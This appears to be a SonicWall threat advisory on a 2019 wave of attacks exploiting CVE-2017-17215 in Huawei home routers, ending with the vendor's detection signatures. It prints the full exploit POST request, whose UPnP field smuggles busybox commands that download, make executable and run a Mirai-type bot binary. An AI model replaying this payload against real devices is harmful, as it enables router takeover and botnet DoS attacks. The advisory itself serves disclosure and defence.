New wave of attacks attempting to exploit Huawei home routers

July 1, 2019

SonicWall has observed a new wave of attacks targeting Huawei home routers in attempt to exploit the vulnerability CVE-2017-17215.
The attack started by scanning internet-facing IP's on port 37215 and then attempting to POST the below command:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
xml version="1.0"
><s:Envelope xmlns:s="" s:encodingStyle=""><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/binary -r /bins/mips
/bin/busybox chmod 777 * /tmp/binary
/tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Once the vulnerability is exploited successfully on the target router, the following shell commands will be executed on the target router:
/bin/busybox wget -g -l /tmp/binary -r /bins/mips // Download and save file
At the time of writing this article, malware download site is active in delivering payloads to the exploited routers. It provides support for a wide range of target architectures, including mips, arm, x86,mpsl, ppc, sh4, m68k and others.



/tmp/binary huawei // Execute file

When executed, these binaries connect to their CnC, can receive commands to conduct various types of DoS such as UDP DoS and TCP DoS attacks against a given target.

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13151 Huawei HG532 Remote Command Execution
GAV: (Cloud Id: 71637770) Mirai.O (Trojan)
GAV: (Cloud Id: 71634637) Mirai.O (Trojan)
GAV: (Cloud Id: 71637780) AELtrojan (Trojan)
GAV: (Cloud Id: 71636342) SMMR1 (Trojan)
GAV: (Cloud Id: 71637710) SMMR1 (Trojan)
GAV: (Cloud Id: 71638263) AELtrojan (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)
GAV: (Cloud Id: 71637583) Mirai.O (Trojan)
GAV: (Cloud Id: 71635399) Mirai.O (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)